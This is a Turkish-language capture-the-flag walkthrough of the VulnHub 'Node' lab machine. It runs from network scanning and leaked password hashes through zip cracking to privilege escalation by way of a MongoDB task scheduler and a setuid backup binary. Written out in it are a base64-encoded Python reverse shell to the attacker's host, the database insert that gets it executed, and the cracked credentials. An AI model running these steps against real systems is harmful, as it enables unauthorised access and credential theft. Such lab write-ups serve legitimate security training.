Makine Hakkında Bilgiler
Açıklama:
Description: Node is a medium level boot2root challenge, originally created for HackTheBox. There are two flags to find (user and root flags) and multiple different technologies to play with. The OVA has been tested on both VMware and Virtual Box.
Vulnhub Sayfası:
https://www.vulnhub.com/entry/node-1,252/
İndirme Sayfası:
https://download.vulnhub.com/node/Node.ova
Walkthrough
Makineyi tespit ederek başlayalım.
┌──(root💀kali)-[~]
└─# arp-scan -l | grep "08:00:27:b8:f3:33"
192.168.110.4 08:00:27:b8:f3:33 PCS Systemtechnik GmbH
┌──(root💀kali)-[~]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.110.3 netmask 255.255.255.0 broadcast 192.168.110.255
inet6 fe80::a00:27ff:fe8b:5efb prefixlen 64 scopeid 0x20<link>
ether 08:00:27:8b:5e:fb txqueuelen 1000 (Ethernet)
RX packets 62 bytes 9857 (9.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5567 bytes 336524 (328.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
nmap taraması ile devam edelim.
[*] Scan: 168
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 09:10 EDT
Nmap scan report for 192.168.110.4
Host is up (0.00096s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
MAC Address: 08:00:27:B8:F3:33 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.96 ms 192.168.110.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.58 seconds
3000 de çalışan bir nodejs uygulamamız var. içerisinde biraz gezindikten sonra burp ile trafiği analiz etmeye başladım ve ilginç bir api cevabı yakaladım.
GET /api/users/latest HTTP/1.1
Host: 192.168.110.4:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: connect.sid=s%3AAIG_kuzVAZJ3cGqwPpRU9i8TSa6787wQ.P24GUCYwUu%2Fx08mlqD1orDQXT29wYaR398WH4hvG9T0
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 611
ETag: W/"263-mJMXKDfX6c4pdWF3bLjHuBIvsM0"
Date: Wed, 07 Jul 2021 09:14:42 GMT
Connection: close
[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]Buradaki kullanıcılardan bazılarının hashlerini internetten kırdım
tom = f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
mark = de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflakeAncak sisteme giriş yaptığımda bana login olmama rağmen bir uyarı veriyordu ve sanırım bir backup dosyası var. Bu kullanıcılarla bu backup dosyasını indiremiyordum. Bunun üzerine inceleme yapmaya devam ettim ve kendim /api/users/ api'ına istek attığımda yeni bir kullanıcı bulum. Daha sonra bu kullanıcının hash'ini kırdım ve bununla login olduğumda bir backup dosyası indirdim.
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 611
ETag: W/"263-mJMXKDfX6c4pdWF3bLjHuBIvsM0"
Date: Wed, 07 Jul 2021 09:14:42 GMT
Connection: close
[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]myP14ceAdm1nAcc0uNT = dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchesterKullanıcıların hiç birinin ssh erişimi yoktu. Bunun üzerine backup dosyası ile ilgileneye başladım.
┌──(root💀kali)-[~/oscp/node]
└─# file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators
┌──(root💀kali)-[~/oscp/node]
└─# cat myplace.backup | base64 -d >> result
┌──(root💀kali)-[~/oscp/node]
└─# file result
result: Zip archive data, at least v1.0 to extract
┌──(root💀kali)-[~/oscp/node]
└─# unzip result
Archive: result
[result] var/www/myplace/package-lock.json password: Görüldüğü üzere bir şifreli zip'le karşıkarşıyayız. Bunun üzerine john kullandım ve şifreyi kırdım.
┌──(root💀kali)-[~/oscp/node]
└─# /usr/sbin/zip2john result >> result-hash 2>/dev/null
┌──(root💀kali)-[~/oscp/node]
└─# cat result-hash
result:$pkzip2$3*2*1*0*8*24*9c88*1223*d3839f108d43fbf4655350f9e7b689cb6a888ebe30027e275c13ee723df07d2de2eda50a*1*0*8*24*37ef*0145*a149d75e6d8ac49cf9e74103048490c2f6e38c814f5f9a35c706d2a1e79945e40b903105*2*0*11*5*118f1dfc*94cb*67*0*11*118f*3d0f*71f9f028888da1a229e6d407e5852a8aff*$/pkzip2$::result:var/www/myplace/node_modules/qs/.eslintignore, var/www/myplace/node_modules/serve-static/README.md, var/www/myplace/package-lock.json:result
┌──(root💀kali)-[~/oscp/node]
└─# rm -rf /root/.john
┌──(root💀kali)-[~/oscp/node]
└─# john result-hash --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (result)
1g 0:00:00:00 DONE (2021-07-07 09:23) 33.33g/s 6144Kp/s 6144Kc/s 6144KC/s sandrea..joan08
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Artık içini açabiliriz.
┌──(root💀kali)-[~/oscp/node]
└─# unzip result 80 ⨯
Archive: result
[result] var/www/myplace/package-lock.json password:
....
inflating: var/www/myplace/static/vendor/angular/angular-route.min.js
inflating: var/www/myplace/static/vendor/angular/angular.min.js
creating: var/www/myplace/static/vendor/bootstrap/
creating: var/www/myplace/static/vendor/bootstrap/css/
inflating: var/www/myplace/static/vendor/bootstrap/css/bootstrap.min.css
inflating: var/www/myplace/static/vendor/bootstrap/css/bootstrap.css
creating: var/www/myplace/static/vendor/bootstrap/fonts/
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.eot
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.svg
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.ttf
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.woff
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.woff2
creating: var/www/myplace/static/vendor/bootstrap/js/
inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.min.js
inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.js
creating: var/www/myplace/static/assets/
creating: var/www/myplace/static/assets/css/
inflating: var/www/myplace/static/assets/css/freelancer.css
inflating: var/www/myplace/static/assets/css/app.css
inflating: var/www/myplace/static/assets/css/freelancer.min.css
creating: var/www/myplace/static/assets/js/
creating: var/www/myplace/static/assets/js/misc/
inflating: var/www/myplace/static/assets/js/misc/freelancer.min.js
creating: var/www/myplace/static/assets/js/app/
inflating: var/www/myplace/static/assets/js/app/app.js
creating: var/www/myplace/static/assets/js/app/controllers/
inflating: var/www/myplace/static/assets/js/app/controllers/admin.js
inflating: var/www/myplace/static/assets/js/app/controllers/profile.js
inflating: var/www/myplace/static/assets/js/app/controllers/login.js
inflating: var/www/myplace/static/assets/js/app/controllers/home.js
creating: var/www/myplace/static/partials/
inflating: var/www/myplace/static/partials/admin.html
inflating: var/www/myplace/static/partials/login.html
inflating: var/www/myplace/static/partials/home.html
inflating: var/www/myplace/static/partials/profile.html
inflating: var/www/myplace/app.html
Proje içerisinden mark kullanıcısının parolasını elde ettim ve ssh ile bağlanabildim.
┌──(root💀kali)-[~/…/node/var/www/myplace]
└─# ls
app.html app.js node_modules package.json package-lock.json static
┌──(root💀kali)-[~/…/node/var/www/myplace]
└─# cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
...┌──(root💀kali)-[~/…/node/var/www/myplace]
└─# ssh [email protected]
[email protected]'s password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Jul 7 11:10:20 2021 from 192.168.110.3
mark@node:~$ Yukarıdaki bilgilerden bir mongo db bağlantısı olduğunu anlıyoruz. İçeri girip kontrol ettiğimde 127.0.0.1'de bir mongo db'nin çalıştığınıda gördüm.
İçeride biraz gezindikten sonra enum scriptlerimi çalıştırdım ve elde ettiğim ilginç sonuçlar aşağıdadır.
[*] usr020 Are there other users in an administrative groups?.............. yes!
---
sudo:x:27:tom
---[!] fst020 Uncommon setuid binaries........................................ yes!
---ore--(7%)
/usr/local/bin/backup
---ore--(7%)
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp LISTEN 0 128 127.0.0.1:27017 *:*
--------- tom ------
START PID USER COMMAND
09:18 1170 tom /usr/bin/node /var/www/myplace/app.js
09:18 1161 tom /usr/bin/node /var/scheduler/app.js
Sanıyorumki makine tom kullanıcısına geçiş yapmamızı istiyor. Ayrıca tom sudo üyesi. Bunun üzerine tom kullanıcısına odaklandım. Normal haricinde çalışan birde /var/scheduler/app.js projesini gördüm.
mark@node:/home/tom$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});Kaynak kodlarını okuduğumuzda her 30000 mili saniyede bir mongo db'de scheduler database'inde tasks collection'undaki cmd verisini çalıştırmakta. Kaynak kodlardan connection string'imizde olduğu için db'ye bağlandım. Birkaç deneme yaptım ancak nc ile reverse alamadım. Bunun üzerine python ve base64 kombininiden reverse aldım.
┌──(root💀kali)-[~/oscp/node]
└─# nano payload
┌──(root💀kali)-[~/oscp/node]
└─# cat payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.3",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
┌──(root💀kali)-[~/oscp/node]
└─# cat payload | base64 >> payloadBase64
┌──(root💀kali)-[~/oscp/node]
└─# cat payloadBase64
cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv
Y2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAu
MyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29z
LmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo=
Evet yukarıdaki hazırlık sonucunda echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAuMyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo= | base64 -d | bash payload'ı ile reverse alabiliriz.
Mongo'ya bağlanalım. Tabi öncesinde nc ile dinleme noktamızı başlatalım.
mark@node:/home/tom$ mongo mongodb://localhost:27017/scheduler?authSource=scheduler --username mark --password 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: mongodb://localhost:27017/scheduler?authSource=scheduler
> show collections
tasks
> db.tasks.insert({"cmd":"echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAuMyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo= | base64 -d | bash"})
WriteResult({ "nInserted" : 1 })┌──(root💀kali)-[~/oscp/node]
└─# nc -lvp 1822
listening on [any] 1822 ...
id
192.168.110.4: inverse host lookup failed: Host name lookup failure
connect to [192.168.110.3] from (UNKNOWN) [192.168.110.4] 53306
id
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$ Harika! İlk flagi alalım o zaman.
tom@node:/$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$ pwd
pwd
/
tom@node:/$ cd /home
cd /home
tom@node:/home$ ls
ls
frank mark tom
tom@node:/home$ cd tom
cd tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1tom kullanıcısı ile incelemeler yaparken aşağıdaki sonucu buldum.
tom@node:~$ ls -al /usr/local/bin/backup
ls -al /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
tom@node:~$
tom@node:~$ cat /etc/group | grep admin
cat /etc/group | grep admin
lpadmin:x:115:tom
admin:x:1002:tom,rootAynı zamanda 3000. portta çalışan nodejs uygulamasının kaynak kodlarında bu doysa kullanılmakta...
...
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
...
app.get('/api/admin/backup', function (req, res) {
if (req.session.user && req.session.user.is_admin) {
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
var backup = '';
proc.on("exit", function(exitCode) {
res.header("Content-Type", "text/plain");
res.header("Content-Disposition", "attachment; filename=myplace.backup");
res.send(backup);
});
proc.stdout.on("data", function(chunk) {
backup += chunk;
});
proc.stdout.on("end", function() {
});
}
else {
res.send({
authenticated: false
});
}
});
app.use(function(req, res, next){
res.sendFile('app.html', { root: __dirname });
});
Bir deneme yaptım ve başarılı oldum. Şuan da istediğim dosyayı okuyabiliyorum.
tom@node:~$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /home/tom/user.txt
<4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /home/tom/user.txt
UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA=tom@node:~$ Bunun üzerine:
┌──(root💀kali)-[~/oscp/node]
└─# echo UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= | base64 -d
PK
�}#K��-!home/tom/user.txtUT ^�YG��`ux
�C��'��v�]�O��rQӇ����tK�� s��M�9���-�P��-!PK
�}#K��-!��home/tom/user.txtUT^�Yux
�PKW�
┌──(root💀kali)-[~/oscp/node]
└─# echo UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= | base64 -d >> test.zip
┌──(root💀kali)-[~/oscp/node]
└─# unzip test.zip
Archive: test.zip
[test.zip] home/tom/user.txt password:
extracting: home/tom/user.txt
┌──(root💀kali)-[~/oscp/node]
└─# ls
gobuster1 hash home hydra-ssh istek myplace.backup passwords payload payloadBase64 result result-hash result.zip test.zip users var
┌──(root💀kali)-[~/oscp/node]
└─# cd home
┌──(root💀kali)-[~/oscp/node/home]
└─# ls
tom
┌──(root💀kali)-[~/oscp/node/home]
└─# cd tom
┌──(root💀kali)-[~/oscp/node/home/tom]
└─# ls
user.txt
┌──(root💀kali)-[~/oscp/node/home/tom]
└─# cat user.txt
e1156acc3574e04b06908ecf76be91b1
Aynı nodejs uygulamasından indirirken yaptığımız işleri tekrarladık. Bunun üzeri,ne direkt olarak root klasörünü okuyabilirim ama o zaman root olmamış olacağım. İlgin bir ikilem. Makine flagi okumamı istiyorsa tamam ama ben root olmak istiyorum.
Öncelikle yanılmışım... 😀
İstediğimiz her path'i okuyamıyoruz. Bunun sebebi kod içerisinde anladığım kadarıyla bazı kısıtlamalar var. Okuyabildiğim bir dosyanın değişkenlerine baktığımda aşağıdaki sonuları aldım.
tom@node:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /home/tom/user.txt
<9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /home/tom/user.txt
__libc_start_main(0x80489fd, 4, 0xff936f14, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xff936dd8, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff936dd8
strcpy(0xff936dc1, "/") = 0xff936dc1
strcpy(0xff936dcd, "/") = 0xff936dcd
strcpy(0xff936d57, "/e") = 0xff936d57
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x99ad008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x99ad008) = 0xff93696f
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x99ad008) = 0xff93696f
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x99ad008) = 0xff93696f
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x99ad008) = 0xff93696f
strcspn("\n", "\n") = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1
fgets(nil, 1000, 0x99ad008) = 0
strstr("/home/tom/user.txt", "..") = nil
strstr("/home/tom/user.txt", "/root") = nil
strchr("/home/tom/user.txt", ';') = nil
strchr("/home/tom/user.txt", '&') = nil
strchr("/home/tom/user.txt", '`') = nil
strchr("/home/tom/user.txt", '$') = nil
strchr("/home/tom/user.txt", '|') = nil
strstr("/home/tom/user.txt", "//") = nil
strcmp("/home/tom/user.txt", "/") = 1
strstr("/home/tom/user.txt", "/etc") = nil
strcpy(0xff93677b, "/home/tom/user.txt") = 0xff93677b
getpid() = 14402
time(0) = 1625669127
clock(0, 0, 0, 0) = 1865
srand(0x3299b689, 0xc72a607a, 0x3299b689, 0x804918c) = 0
rand(0, 0, 0, 0) = 0x3e46ace5
sprintf("/tmp/.backup_1044819173", "/tmp/.backup_%i", 1044819173) = 23
sprintf("/usr/bin/zip -r -P magicword /tm"..., "/usr/bin/zip -r -P magicword %s "..., "/tmp/.backup_1044819173", "/home/tom/user.txt") = 83
system("/usr/bin/zip -r -P magicword /tm"... <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
access("/tmp/.backup_1044819173", 0) = 0
sprintf("/usr/bin/base64 -w0 /tmp/.backup"..., "/usr/bin/base64 -w0 %s", "/tmp/.backup_1044819173") = 43
system("/usr/bin/base64 -w0 /tmp/.backup"...UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAAcqtGwp+gTiVnNFvcUs8ZqOQDSs50Dsv9+FZqgtXg21h+fhf8qZbFg01CTUbAUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
remove("/tmp/.backup_1044819173") = 0
fclose(0x99ad008) = 0
+++ exited (status 0) +++Birde okuyamadığıma baktım.
tom@node:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
<9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
__libc_start_main(0x80489fd, 4, 0xff8c00d4, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xff8bff98, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff8bff98
strcpy(0xff8bff81, "/") = 0xff8bff81
strcpy(0xff8bff8d, "/") = 0xff8bff8d
strcpy(0xff8bff17, "/e") = 0xff8bff17
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x8e95008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x8e95008) = 0xff8bfb2f
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x8e95008) = 0xff8bfb2f
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x8e95008) = 0xff8bfb2f
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x8e95008) = 0xff8bfb2f
strcspn("\n", "\n") = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1
fgets(nil, 1000, 0x8e95008) = 0
strstr("/root", "..") = nil
strstr("/root", "/root") = "/root"
strcpy(0xff8beb68, "Finished! Encoded backup is belo"...) = 0xff8beb68
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:
) = 51
